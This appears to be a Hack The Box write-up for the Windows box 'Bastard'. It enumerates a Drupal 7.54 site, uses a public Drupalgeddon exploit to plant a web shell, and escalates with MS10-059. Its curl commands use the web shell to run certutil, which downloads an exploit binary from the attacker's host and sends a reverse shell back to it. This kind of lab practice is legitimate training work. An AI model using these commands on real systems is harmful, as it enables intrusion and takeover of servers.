# HTB | Bastard This is a Windows box. You can find it [here](https://app.hackthebox.com/machines/Bastard). #### Skill Learned * Enumerating CMS versions (Drupal) * Exploit modification ## NMAP IP: 10.10.10.9

nmap scan

### Port 80 We found a Drupal website

port 80

In robots.txt we found CHANGELOG.txt

/robots.txt

/changelog.txt

We found Drupal 7.54 ## Foothold/shell and Priv Esc Found Drupalgeddon3 on searchsploit

searchsploit

Msf exploit was not working Let's try [this](https://www.exploit-db.com/exploits/41564). Change the URL, endpoint\_path, filename, data
and run

running php

It gave us two files user.json and session.json

user.json

Let's try and crack administrator hash ``` hashcat -m 7900 admin.hash /home/anurag/Downloads/rockyou.txt --force ``` It is taking too much time, We have an alternate way. Remember we have test.php on the server. We can curl ``` curl http://10.10.10.9/test.php?cmd=whoami ```

curl http://10.10.10.9/test.php?cmd=whoami

Let's use windows-exploit-suggester copy systeminfo

systeminfo

update the database and run

windows-exploit-suggester

Let's use [this](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059) We will copy the exe on the box ``` curl http://10.10.10.9/test.php?cmd="certutil%20-urlcache%20-f%20http://10.10.14.14:80/MS10-059.exe%20MS10-059.exe" ```

putting exploit

Let's run it ``` curl http://10.10.10.9/test.php?cmd="MS10-059.exe%2010.10.14.14%201234" ```

running exploit

geting shell

and we are nt\authority Found user.txt

user.txt

found root.txt

root.txt